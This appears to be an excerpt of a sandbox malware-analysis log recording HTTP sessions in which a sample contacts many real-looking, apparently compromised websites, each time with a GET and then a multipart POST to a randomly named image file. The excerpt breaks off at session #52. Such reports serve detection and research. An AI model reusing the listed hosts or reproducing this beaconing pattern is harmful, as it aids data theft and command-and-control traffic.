Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = acbt.fr, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = acbt.fr/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #30
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name acbt.fr
Server Port 80
Data Sent 240
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = acbt.fr, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/image/kemeda.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = acbt.fr/data/image/kemeda.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #31
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name wpakademi.com
Server Port 80
Data Sent 230
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = wpakademi.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = wpakademi.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #32
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name wpakademi.com
Server Port 80
Data Sent 255
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = wpakademi.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/imgs/esfuru.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = wpakademi.com/includes/imgs/esfuru.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #33
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.cakav.hu
Server Port 80
Data Sent 228
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.cakav.hu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.cakav.hu/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #34
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.cakav.hu
Server Port 80
Data Sent 259
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.cakav.hu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = news/pictures/heimammomees.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.cakav.hu/news/pictures/heimammomees.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #35
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.mimid.cz
Server Port 80
Data Sent 228
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.mimid.cz, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.mimid.cz/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #36
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.mimid.cz
Server Port 80
Data Sent 254
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.mimid.cz, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/pictures/rume.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.mimid.cz/uploads/pictures/rume.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #37
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 6chen.cn
Server Port 80
Data Sent 220
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 6chen.cn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 6chen.cn/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #38
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name 6chen.cn
Server Port 80
Data Sent 248
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 6chen.cn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/tmp/dekedaso.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = 6chen.cn/wp-content/tmp/dekedaso.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #39
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name goodapd.website
Server Port 80
Data Sent 234
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = goodapd.website, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = goodapd.website/ False 1
Fn
HTTP Session #40
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name goodapd.website
Server Port 80
Data Sent 262
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = goodapd.website, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/image/sosede.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = goodapd.website/wp-content/image/sosede.png False 1
Fn
Close Session - True 58
Fn
HTTP Session #41
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name oceanlinen.com
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = oceanlinen.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = oceanlinen.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #42
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name oceanlinen.com
Server Port 80
Data Sent 264
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = oceanlinen.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/graphic/eskasomo.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = oceanlinen.com/wp-content/graphic/eskasomo.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #43
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name tommarmores.com.br
Server Port 80
Data Sent 240
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = tommarmores.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = tommarmores.com.br/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #44
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name tommarmores.com.br
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = tommarmores.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/assets/mokahe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = tommarmores.com.br/uploads/assets/mokahe.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #45
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name nesten.dk
Server Port 80
Data Sent 222
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = nesten.dk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = nesten.dk/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #46
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name nesten.dk
Server Port 80
Data Sent 249
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = nesten.dk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/images/sezumo.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = nesten.dk/includes/images/sezumo.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #47
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name zaeba.co.uk
Server Port 80
Data Sent 226
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = zaeba.co.uk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = zaeba.co.uk/ False 1
Fn
HTTP Session #48
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name zaeba.co.uk
Server Port 80
Data Sent 248
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = zaeba.co.uk, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/tmp/sose.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = zaeba.co.uk/includes/tmp/sose.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #49
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.n2plus.co.th
Server Port 80
Data Sent 236
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.n2plus.co.th, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.n2plus.co.th/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #50
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.n2plus.co.th
Server Port 80
Data Sent 259
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.n2plus.co.th, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = news/assets/kadeka.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.n2plus.co.th/news/assets/kadeka.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #51
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name koloritplus.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = koloritplus.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = koloritplus.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #52
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name koloritplus.ru
Server Port 80
Data Sent 262
Data Received 0
